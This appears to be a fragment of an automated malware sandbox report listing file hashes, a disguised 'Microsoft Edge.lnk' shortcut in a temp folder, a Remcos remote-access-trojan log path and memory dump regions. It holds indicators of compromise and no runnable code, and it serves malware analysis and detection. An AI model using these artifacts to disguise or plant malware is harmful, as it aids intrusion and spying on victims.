SHA1 331d4c34cd630a0b1b422c0d3708455367d59d99
SHA256 85cad85957220c0d6490e6aa825df7a863bea04940e9818530eaa038d9207bbf
SHA512 a7b5229ae9157bca066caea76af71a6573a3907a640213318ee53fbc06f8e700a55fb6b25b50f5fce023b705ca9ff5d5ccf435dd55cd3227dbdfcc84f51251f7

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Microsoft Edge.lnk

MD5 9a9111d525c5ebbe85589f953cd1cb88
SHA1 3bac95a4caaea30259afaa9067b53fcb3ebaecee
SHA256 8ccdd4ab8a41380440cae41bbe6ee5bf02e0e3754cbd2ba73a09f83ee17db4df
SHA512 4edf6b0357d3d832fbe05e38d6f27c34cdeda5e62968c53e62a438538d2bacb6d48c49fb2b59d361a08fd83460277ec423af909f77b741fe907f22f923ef61a7

memory/3376-361-0x0000000000A80000-0x0000000001CD4000-memory.dmp

C:\ProgramData\remcos\logs.dat

MD5 8e008f429d5dddb60eb390aa27918231
SHA1 37dab35f711f4d04e261802f3796e33cd7ae0402
SHA256 7d6a9586845e8c44c0bbd4bdb9cd0895a0578c52e76b6b5ef39b172145327973
SHA512 f450c819bee29b5cf4a5286c41d62d9bb66bc849888374c061b165c2b7288354983c43f4e1c406debe2251a2db8bb60398b74b886bfa8acc8c4de21b26beed63

memory/3376-363-0x0000000000A80000-0x0000000001CD4000-memory.dmp

memory/3376-366-0x0000000000A80000-0x0000000001CD4000-memory.dmp

memory/3376-369-0x0000000000A80000-0x0000000001CD4000-memory.dmp

memory/3376-372-0x0000000000A80000-0x0000000001CD4000-memory.dmp

memory/3376-375-0x0000000000A80000-0x0000000001CD4000-memory.dmp

memory/3376-378-0x0000000000A80000-0x0000000001CD4000-memory.dmp

memory/3376-381-0x0000000000A80000-0x0000000001CD4000-memory.dmp

memory/3376-384-0x0000000000A80000-0x0000000001CD4000-memory.dmp